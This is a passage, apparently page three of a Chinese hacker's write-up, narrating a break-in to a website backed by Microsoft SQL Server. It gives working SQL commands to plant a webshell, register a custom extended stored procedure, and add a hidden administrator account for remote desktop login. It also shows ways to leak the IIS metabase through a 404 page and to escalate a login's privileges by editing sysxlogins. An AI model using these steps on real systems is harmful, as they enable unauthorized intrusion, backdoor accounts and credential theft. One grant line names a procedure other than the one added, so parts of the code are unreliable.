再次陷入困境。在百般无耐的情况下，只能用一个没办法的点子——猜WEB目录路径。
用读文件的方法，尝试读取网站的主页。后面还是RP好，猜了4次后被我猜到了WEB目录。D:\网站名\index.asp
当文件内容被读取出来时，那个兴奋啊，于是立即用差异备份，备份了一个WEBSHELL。如图7

从WEBSHELL中找到了数据库连接文件，获得了SA的密码。
然后再从WEBSHELL上传了一个自己的存储扩展，用海阳ASP木马的的数据库管理功能，连接数据库后，用如下语句添加了一个自己的存储扩展！
use master
exec sp_addextendedproc 'xp_nspcn', 'xp_nspcn.dll'
grant exec
on xp_npsed
to public
再用自己的存储扩展执行如下语句
Exec master.dbo.xp_nspcn 'net user nspcn netpatch /add&&net localgroup administrators nspcn /add'
再用添加的用户成功登陆了3389。如图8

虽然进去了，但这是侥幸进去的，并不是完全靠实力进去的，心中有所不服。心想，要是现在不解决这个问题，以后碰到类似的，那不就更郁闷了。于是再次研究各个存储扩展的语法。研究后才发现了自己前面犯的三个严重错误，导致自己绕了一大圈才进去。
第一。本可以利用xp_makecab、xp_unpackcab配合404页面，获取路径！
下面是相关的SQL语句。

Exec master..xp_makecab 'C:\WINNT\Help\iisHelp\common\404b.cab','mszip',1,' C:\WINNT\Help\iisHelp\common\404b.htm'
--先备份404b.htm页面
Exec master..xp_makecab 'C:\WINNT\Help\iisHelp\common\metabase.cab','mszip',1,'C:\WINNT\system32\inetsrv\MetaBase.bin'
--备份metabase.bin文件到C:\WINNT\Help\iisHelp\common\目录
exec master..xp_unpackcab 'C:\WINNT\Help\iisHelp\common\metabase.cab',' C:\WINNT\Help\iisHelp\common\',1,' 404b.htm'
--将MetaBase.bin从C:\WINNT\Help\iisHelp\common\metabase.cab中解压出来，并重命名为404b.htm
然后我们访问该站不存在的文件名，就可以利用404b文件帮我们列出文件内容了。
第二。就是加SYSADMIN权限的SQL用户时漏了个逗号，导致添加帐号失败！
第三。用了笨办法来修改SA密码！
其实完全可以用exec master.dbo.sp_configure 'allow updates', 1;RECONFIGURE WITH OVERRIDE; update sysxlogins set xstatus=18

上一页  [1] [2] [3]